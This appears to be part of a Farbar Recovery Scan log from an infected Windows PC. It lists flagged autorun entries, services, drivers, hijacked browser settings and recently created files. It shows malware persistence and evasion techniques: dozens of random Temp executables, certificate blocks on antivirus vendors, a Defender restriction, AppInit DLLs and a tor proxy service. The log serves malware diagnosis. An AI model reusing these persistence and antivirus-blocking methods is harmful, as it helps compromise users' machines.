HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) <==== ATTENTION
HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) <==== ATTENTION
HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) <==== ATTENTION
HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-19\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518144 2018-04-12] (Microsoft Corporation)
HKU\S-1-5-20\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518144 2018-04-12] (Microsoft Corporation)
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [uTorrent] => "C:\Users\Craciun\AppData\Roaming\uTorrent\uTorrent.exe"  /MINIMIZED
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [DAEMON Tools Pro Agent] => C:\Program Files\DAEMON Tools Pro\DTAgent.exe [4807952 2015-02-27] (Disc Soft Ltd)
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [9smAipOnMy.exe] => C:\Program Files\Synaptics\PS1O1Z7IEGLDHYG\9smAipOnMy.exe 
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [7DDHIUFMJV2EL7F] => "C:\Program Files (x86)\ShutdownTime\5FZPC.exe"
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [RestlessDream] => C:\Windows\rss\csrss.exe [3188736 2018-05-24] () <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [SUPERAntiSpyware] => C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [6R71.exe] => C:\Users\Craciun\AppData\Local\Temp\CDQUIA1MVU\6R71.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [CloudNet] => C:\Users\Craciun\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [680960 2018-06-10] (EpicNet Inc.) <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [OUXZ.exe] => C:\Users\Craciun\AppData\Local\Temp\TGGSGCKZPL\OUXZ.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [U2DF.exe] => C:\Users\Craciun\AppData\Local\Temp\KE0R86LF9W\U2DF.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [YUFW.exe] => C:\Users\Craciun\AppData\Local\Temp\9G237R4OUT\YUFW.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [X7KF.exe] => C:\Users\Craciun\AppData\Local\Temp\Q4WT4U9OKD\X7KF.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [J4DW.exe] => C:\Users\Craciun\AppData\Local\Temp\S8U9G5VHAK\J4DW.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [QC81.exe] => C:\Users\Craciun\AppData\Local\Temp\WXRTGWWTMA\QC81.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [LXYS.exe] => C:\Users\Craciun\AppData\Local\Temp\88RDI2YFE2\LXYS.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [TG0F.exe] => C:\Users\Craciun\AppData\Local\Temp\TG0FRLEG66\TG0F.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [U5Y0.exe] => C:\Users\Craciun\AppData\Local\Temp\U5Y0DOU28Z\U5Y0.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [3BMC.exe] => C:\Users\Craciun\AppData\Local\Temp\SN8NAMCXNP\3BMC.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [K5DU.exe] => C:\Users\Craciun\AppData\Local\Temp\VAOXBKCGFX\K5DU.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [FIHG.exe] => C:\Users\Craciun\AppData\Local\Temp\2TA1Y9DOJW\FIHG.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [YOV7.exe] => C:\Users\Craciun\AppData\Local\Temp\LZOS39VX3X\YOV7.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [H6Z0.exe] => C:\Users\Craciun\AppData\Local\Temp\GOU608OGIL\H6Z0.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [CKIC.exe] => C:\Users\Craciun\AppData\Local\Temp\ZVCX6FUVQ7\CKIC.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [53NL.exe] => C:\Users\Craciun\AppData\Local\Temp\WF2NKP99YT\53NL.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [KWWC.exe] => C:\Users\Craciun\AppData\Local\Temp\98JOIXN0JH\KWWC.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [QVLM.exe] => C:\Users\Craciun\AppData\Local\Temp\D6E7ZCWRA6\QVLM.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [QLWM.exe] => C:\Users\Craciun\AppData\Local\Temp\QLWMUKQ53V\QLWM.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [FCY5.exe] => C:\Users\Craciun\AppData\Local\Temp\FCY5J3YAYR\FCY5.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [8G3O.exe] => C:\Users\Craciun\AppData\Local\Temp\8G3OPERZE7\8G3O.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [MUSU.exe] => C:\Users\Craciun\AppData\Local\Temp\MUSUQ6URHH\MUSU.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [LCQF.exe] => C:\Users\Craciun\AppData\Local\Temp\8NK0ND5Z6H\LCQF.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [P5VP.exe] => C:\Users\Craciun\AppData\Local\Temp\P5VP6BI7NG\P5VP.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [V6OZ.exe] => C:\Users\Craciun\AppData\Local\Temp\V6OZMU6NHQ\V6OZ.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [JAQ3.exe] => C:\Users\Craciun\AppData\Local\Temp\ZIV2N825LS\JAQ3.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [HMHK.exe] => C:\Users\Craciun\AppData\Local\Temp\HMHKW0J8G1\HMHK.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [Z87K.exe] => C:\Users\Craciun\AppData\Local\Temp\Z87KLFT34W\Z87K.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [042B.exe] => C:\Users\Craciun\AppData\Local\Temp\CQI82VFER8\042B.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [JOBY.exe] => C:\Users\Craciun\AppData\Local\Temp\JOBYT3PP9O\JOBY.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [7445.exe] => C:\Users\Craciun\AppData\Local\Temp\EOP5OYG8UR\7445.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [IZU8.exe] => C:\Users\Craciun\AppData\Local\Temp\IZU8IX3CIG\IZU8.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [MaxiBuy] => C:\Users\Craciun\AppData\Roaming\MaxiBuy\python\pythonw.exe [95904 2018-05-02] (Python Software Foundation) <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [K98S.exe] => C:\Users\Craciun\AppData\Local\Temp\K98SCZW5CO\K98S.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [AD0N.exe] => C:\Users\Craciun\AppData\Local\Temp\XOU8ZSM5DL\AD0N.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [R02G.exe] => C:\Users\Craciun\AppData\Local\Temp\R02GTSCW7N\R02G.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [W5PX.exe] => C:\Users\Craciun\AppData\Local\Temp\W5PXPDVPH1\W5PX.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [LF5I.exe] => C:\Users\Craciun\AppData\Local\Temp\JU96A3V4UT\LF5I.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [2BGG.exe] => C:\Users\Craciun\AppData\Local\Temp\V7SUS9JGHN\2BGG.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [JServicesManager] => C:\Program Files\SystemaRev\RevServicesX\app.ex
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [UCF4.exe] => C:\Users\Craciun\AppData\Local\Temp\UCF4SO8U9O\UCF4.exe [452608 2018-06-11] () <==== ATTENTION
AppInit_DLLs: C:\ProgramData\Subair\Trusttansoft.dll => C:\ProgramData\Subair\Trusttansoft.dll [342528 2018-05-26] ()
AppInit_DLLs-x32: C:\ProgramData\Subair\S--Fix.dll => C:\ProgramData\Subair\S--Fix.dll [460800 2018-05-26] ()
ShellExecuteHooks: No Name - {BFD98515-CD74-48A4-98E2-13D209E3EE4F} - C:\Windows\System32\mcicda64.dll [2990080 2018-03-24] () <==== ATTENTION
GroupPolicy: Restriction ? <==== ATTENTION
GroupPolicy\User: Restriction ? <==== ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{0b41cb42-7f71-4fe2-a7d7-a86604cbe95a}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{bd1fecd1-e9c9-4f98-a7f1-e2b2d288d553}: [DhcpNameServer] 192.168.0.1
 
Internet Explorer:
==================
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iY1JmNoT6P_LBC58xFfZfVmoWmroNmrmUx8_e4oxvuDKV9xTzbBCRgXd1mMyYXcmAdQQyyvLWU57UoocABathQHtYaRfAjwJpXRqIgaWUaVd1HXtAhJiyaJgHOJ4wq7EDZHG4Pa06A1qF3LSfTcbkeUsTXIcpzbBTXUQzjikUs,&q={searchTerms}
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iY1JmNoT6P_LBC58xFfZfVmoWmroNmrmUx8_e4oxvuDKV9xTzbBCRgXd1mMyYXcmAdQQyyvLWU57UoofG1UzdLvJaOTe5RZu6mfibq4HA6E3-LxFj4oSu6ZB6kD9RIOjbV3B7D5mvYBN6KpUo6tpuMSJcs10XaI4YpAln9M9NA,
SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL = 
SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iY1JmNoT6P_LBC58xFfZfVmoWmroNmrmUx8_e4oxvuDKV9xTzbBCRgXd1mMyYXcmAdQQyyvLWU57UoocABathQHtYaRfAjwJpXRqIgaWUaVd1HXtAhJiyaJgHOJ4wq7EDZHG4Pa06A1qF3LSfTcbkeUsTXIcpzbBTXUQzjikUs,&q={searchTerms}
SearchScopes: HKU\S-1-5-21-3764278317-3264620232-1554668131-1000 -> DefaultScope {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iY1JmNoT6P_LBC58xFfZfVmoWmroNmrmUx8_e4oxvuDKV9xTzbBCRgXd1mMyYXcmAdQQyyvLWU57UoocABathQHtYaRfAjwJpXRqIgaWUaVd1HXtAhJiyaJgHOJ4wq7EDZHG4Pa06A1qF3LSfTcbkeUsTXIcpzbBTXUQzjikUs,&q={searchTerms}
SearchScopes: HKU\S-1-5-21-3764278317-3264620232-1554668131-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02&pc=UE04
SearchScopes: HKU\S-1-5-21-3764278317-3264620232-1554668131-1000 -> {A16A49A0-78F1-4E53-AB5A-E15E791CE3BB} URL = hxxps://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?}
SearchScopes: HKU\S-1-5-21-3764278317-3264620232-1554668131-1000 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iY1JmNoT6P_LBC58xFfZfVmoWmroNmrmUx8_e4oxvuDKV9xTzbBCRgXd1mMyYXcmAdQQyyvLWU57UoocABathQHtYaRfAjwJpXRqIgaWUaVd1HXtAhJiyaJgHOJ4wq7EDZHG4Pa06A1qF3LSfTcbkeUsTXIcpzbBTXUQzjikUs,&q={searchTerms}
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_161\bin\ssv.dll [2018-01-30] (Oracle Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_161\bin\jp2ssv.dll [2018-01-30] (Oracle Corporation)
 
FireFox:
========
FF DefaultProfile: blqunqo0.default
FF ProfilePath: C:\Users\Craciun\AppData\Roaming\Mozilla\Firefox\Profiles\blqunqo0.default [2018-06-11]
FF Homepage: Mozilla\Firefox\Profiles\blqunqo0.default -> C:\ProgramData\Subairs\ff.HP
FF NewTab: Mozilla\Firefox\Profiles\blqunqo0.default -> C:\ProgramData\Subairs\ff.NT
FF SearchPlugin: C:\Users\Craciun\AppData\Roaming\Mozilla\Firefox\Profiles\blqunqo0.default\searchplugins\findit.xml [2018-05-26]
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2018-04-24] (Adobe Systems)
FF Plugin-x32: @java.com/DTPlugin,version=11.161.2 -> C:\Program Files (x86)\Java\jre1.8.0_161\bin\dtplugin\npDeployJava1.dll [2018-01-30] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.161.2 -> C:\Program Files (x86)\Java\jre1.8.0_161\bin\plugin2\npjp2.dll [2018-01-30] (Oracle Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.17\npGoogleUpdate3.dll [No File]
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.17\npGoogleUpdate3.dll [No File]
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2018-04-24] (Adobe Systems)
 
Chrome: 
=======
CHR res: Infected resources.pak (Adware script). Reinstall Chrome. <==== ATTENTION
CHR HomePage: Default -> inline.go.mail.ru
CHR StartupUrls: Default -> "hxxps://www.google.ro/?pli=1"
CHR DefaultSearchURL: Default -> hxxps://www.google.ro/search?source=hp&ei=jQQbW7ejGsWiwALNrqHoCw&btnG=C%C4%83uta%C8%9Bi&q={searchTerms}&oq=how+to+get+to+system+settings+when+boot&gs_l=psy-ab.3...7315.57108.0.57433.116.76.0.0.0.0.1430.1430.7-1.1.0....0...1.1.64.psy-ab..115.1.1429.0..0i8i10i30k1.0.PEgGww2OXY8
CHR Profile: C:\Users\Craciun\AppData\Local\Google\Chrome\User Data\Default [2018-06-11]
CHR Extension: (Slides) - C:\Users\Craciun\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-10-12]
CHR Extension: (Docs) - C:\Users\Craciun\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-12]
CHR Extension: (Google Drive) - C:\Users\Craciun\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-07-28]
CHR Extension: (YouTube) - C:\Users\Craciun\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-07-28]
CHR Extension: (Sheets) - C:\Users\Craciun\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-10-12]
CHR Extension: (Google Docs Offline) - C:\Users\Craciun\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-07-28]
CHR Extension: (AdBlock) - C:\Users\Craciun\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2018-05-24]
CHR Extension: (Video Adblocker for Youtube™ Extension) - C:\Users\Craciun\AppData\Local\Google\Chrome\User Data\Default\Extensions\hflefjhkfeiaignkclmphmokmmbhbhik [2018-05-24]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Craciun\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-04-04]
CHR Extension: (Gmail) - C:\Users\Craciun\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-07-28]
CHR Extension: (Chrome Media Router) - C:\Users\Craciun\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-05-02]
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [818128 2018-04-24] (Adobe Systems Incorporated)
R2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [2321384 2018-05-11] (Adobe Systems, Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2128872 2018-05-11] (Adobe Systems, Incorporated)
S2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6541008 2018-05-09] (Malwarebytes)
R2 MicroService; C:\Users\Craciun\AppData\Local\XService\XService.dll [585216 2018-05-24] () [File not signed] <==== ATTENTION
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [201360 2012-09-27] (Realtek Semiconductor)
R2 RtkBtManServ; C:\WINDOWS\RtkBtManServ.exe [250136 2017-05-04] (Realtek Semiconductor Corp.)
S2 saiyitechnology; C:\ProgramData\yahoochrome_D\desktop245.exe [517432 2018-05-21] (PandaViewer)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [4737448 2018-04-12] (Microsoft Corporation)
S3 ssh-agent; C:\Windows\System32\OpenSSH\ssh-agent.exe [495616 2018-03-10] ()
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [278616 2017-05-05] (Synaptics Incorporated)
S3 SystemUpdate64; C:\Program Files\SystemaRev\RevServicesX\SystemUpdate64x.exe [593920 2018-06-08] (SystemaRev) [File not signed] <==== ATTENTION
S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.14.17639.18041-0\NisSrv.exe [4632736 2018-04-26] (Microsoft Corporation)
S3 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.14.17639.18041-0\MsMpEng.exe [104680 2018-04-26] (Microsoft Corporation)
R2 WinDefender; C:\WINDOWS\windefender.exe [0 ] () <==== ATTENTION (zero byte File/Folder)
S2 backlh; C:\ProgramData\Logic Cramble\set.exe [X] <==== ATTENTION
S3 Disc Soft Pro Bus Service; "C:\Program Files\DAEMON Tools Pro\DiscSoftBusService.exe" [X]
S2 gupdate; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc [X]
S3 gupdatem; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc [X]
S2 Nettrans; C:\ProgramData\PrefsSecure\Nettrans.exe [X] <==== ATTENTION
S2 Subair; C:\ProgramData\\Subair\\Subair.exe shuz -f "C:\ProgramData\\Subair\\Subair.dat" -l -a <==== ATTENTION
R2 TCPSvc; "C:\Users\Craciun\AppData\Local\Temp\csrss\proxy\tor.exe" --nt-service -f "C:\Users\Craciun\AppData\Local\Temp\csrss\proxy\config" --Log "notice file C:\Users\Craciun\AppData\Local\Temp\csrss\proxy\t" <==== ATTENTION
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 dtlitescsibus; C:\Windows\System32\drivers\dtlitescsibus.sys [30264 2016-12-06] (Disc Soft Ltd)
R3 dtproscsibus; C:\Windows\System32\drivers\dtproscsibus.sys [30352 2017-07-06] (Disc Soft Ltd)
R1 gtkrnl; C:\Windows\System32\drivers\gtkrnl.sys [126856 2018-03-28] ()
R1 HWiNFO32; C:\WINDOWS\SysWOW64\drivers\HWiNFO64A.SYS [27552 2017-05-03] (REALiX™)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [984032 2017-07-05] (Realtek )
R3 RtkBtFilter; C:\Windows\system32\DRIVERS\RtkBtfilter.sys [712704 2017-05-10] (Realtek Semiconductor Corporation)
R3 RTSUER; C:\Windows\system32\Drivers\RtsUer.sys [419296 2017-05-04] (Realsil Semiconductor Corporation)
R3 rtwlane_13; C:\Windows\System32\drivers\rtwlane_13.sys [3717120 2018-04-12] (Realtek Semiconductor Corporation )
R1 SASDIFSV; C:\Program Files\SUPERAntiSpyware\SASDIFSV64.SYS [14928 2011-07-22] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
R1 SASKUTIL; C:\Program Files\SUPERAntiSpyware\SASKUTIL64.SYS [12368 2011-07-13] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
S3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [51392 2015-10-09] (Synaptics Incorporated)
R3 Thotkey; C:\Windows\System32\drivers\Thotkey.sys [52816 2016-08-03] (Toshiba Client Solutions Co., Ltd.)
S3 WdBoot; C:\Windows\system32\drivers\wd\WdBoot.sys [46072 2018-04-26] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\wd\WdFilter.sys [313888 2018-04-26] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\drivers\wd\WdNisDrv.sys [61472 2018-04-26] (Microsoft Corporation)
R3 Winmon; C:\WINDOWS\System32\drivers\Winmon.sys [0 ] () <==== ATTENTION (zero byte File/Folder)
R3 WinmonFS; C:\WINDOWS\System32\drivers\WinmonFS.sys [0 ] (Windows ® Win 7 DDK provider) <==== ATTENTION (zero byte File/Folder)
R1 WinmonProcessMonitor; C:\WINDOWS\System32\drivers\WinmonProcessMonitor.sys [36096 2018-05-24] () [File not signed] <==== ATTENTION
U0 Partizan; system32\drivers\Partizan.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2018-06-11 20:39 - 2018-06-11 20:42 - 000030235 _____ C:\Users\Craciun\Desktop\FRST.txt
2018-06-11 20:37 - 2018-06-11 20:39 - 000000000 ____D C:\FRST
2018-06-11 20:36 - 2018-06-11 20:36 - 002413056 _____ (Farbar) C:\Users\Craciun\Desktop\FRST64.exe
2018-06-11 07:58 - 2018-06-11 07:58 - 000000000 ___HD C:\OneDriveTemp
2018-06-09 18:22 - 2018-06-09 18:40 - 000000000 ____D C:\Users\Craciun\AppData\Roaming\MaxiBuy
2018-06-09 18:22 - 2018-06-09 18:22 - 000003464 _____ C:\Windows\System32\Tasks\MaxiBuy2
2018-06-09 18:22 - 2018-06-09 18:22 - 000003454 _____ C:\Windows\System32\Tasks\MaxiBuy
2018-06-09 18:22 - 2018-06-09 18:22 - 000000000 ____D C:\Users\Craciun\AppData\Roaming\Python
2018-06-09 18:21 - 2018-06-09 18:22 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maxi Buy
2018-06-09 18:21 - 2018-06-09 18:22 - 000000000 ____D C:\Program Files (x86)\Maxi Buy
2018-06-08 22:09 - 2018-06-08 22:09 - 000029203 _____ C:\Users\Craciun\Desktop\attach.txt
2018-06-08 22:09 - 2018-06-08 22:08 - 000035804 _____ C:\Users\Craciun\Desktop\dds.txt
2018-06-08 21:30 - 2018-06-08 21:45 - 000003608 _____ C:\Users\Craciun\Desktop\Rkill.txt
2018-06-08 10:55 - 2018-06-08 10:55 - 000001302 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk
2018-06-08 10:55 - 2018-06-08 10:55 - 000001290 _____ C:\Users\Public\Desktop\Adobe Creative Cloud.lnk
2018-06-08 10:39 - 2018-06-08 10:39 - 000196260 _____ C:\Windows\ntbtlog.txt
2018-06-08 09:05 - 2018-06-11 20:31 - 000003890 _____ C:\Windows\System32\Tasks\Update_4.0.8
2018-06-08 09:05 - 2018-06-08 09:05 - 000000000 ____D C:\Program Files\SystemaRev
2018-06-07 20:22 - 2018-06-09 18:41 - 000000000 ____D C:\Users\Craciun\AppData\Roaming\bsvctp
2018-06-07 20:17 - 2018-06-07 20:17 - 000016802 _____ C:\Windows\System32\Tasks\Sawmenger XP
2018-06-07 07:52 - 2018-06-11 20:31 - 000003878 _____ C:\Windows\System32\Tasks\MainPMgr
2018-06-04 19:53 - 2018-06-04 19:53 - 000000000 ____D C:\Users\Craciun\AppData\Roaming\schedsvc
2018-06-02 16:30 - 2018-06-03 08:46 - 000000000 ____D C:\Users\Craciun\AppData\Roaming\gsvc
2018-05-30 20:48 - 2018-05-30 19:55 - 000094208 _____ (scaxvnlzpnrzqclaez) C:\Users\Craciun\AppData\Roaming\command.dll
2018-05-30 20:48 - 2018-05-30 19:05 - 000623616 _____ (rsltggjgfwnwdwxcud) C:\Users\Craciun\AppData\Roaming\product.dll
2018-05-27 00:14 - 2018-06-11 20:31 - 000000000 ____D C:\Users\Craciun\AppData\Roaming\SystemaRev
2018-05-26 14:23 - 2018-05-27 09:38 - 000000000 ____D C:\Program Files (x86)\SystemHealer
2018-05-26 14:23 - 2018-05-26 14:32 - 000000000 ____D C:\ProgramData\Subair
2018-05-26 14:23 - 2018-05-26 14:24 - 000015610 _____ C:\Windows\SysWOW64\findit.xml
2018-05-26 14:23 - 2018-05-26 14:24 - 000000000 ____D C:\ProgramData\Logic Cramble
2018-05-26 14:23 - 2018-05-26 14:23 - 001895382 _____ C:\Users\Craciun\AppData\Local\Subity.bin
2018-05-26 14:23 - 2018-05-26 14:23 - 000003416 _____ C:\Windows\System32\Tasks\System Healer Monitor
2018-05-26 14:23 - 2018-05-26 14:23 - 000003408 _____ C:\Windows\System32\Tasks\System Healer Delayed
2018-05-26 14:23 - 2018-05-26 14:23 - 000000000 ____D C:\Users\Craciun\AppData\Roaming\System Healer
2018-05-26 14:23 - 2018-05-26 14:23 - 000000000 ____D C:\ProgramData\Subairs
2018-05-26 14:23 - 2018-05-26 14:23 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Healer
2018-05-26 14:22 - 2018-05-26 14:22 - 007611392 _____ C:\Users\Craciun\AppData\Local\agent.dat
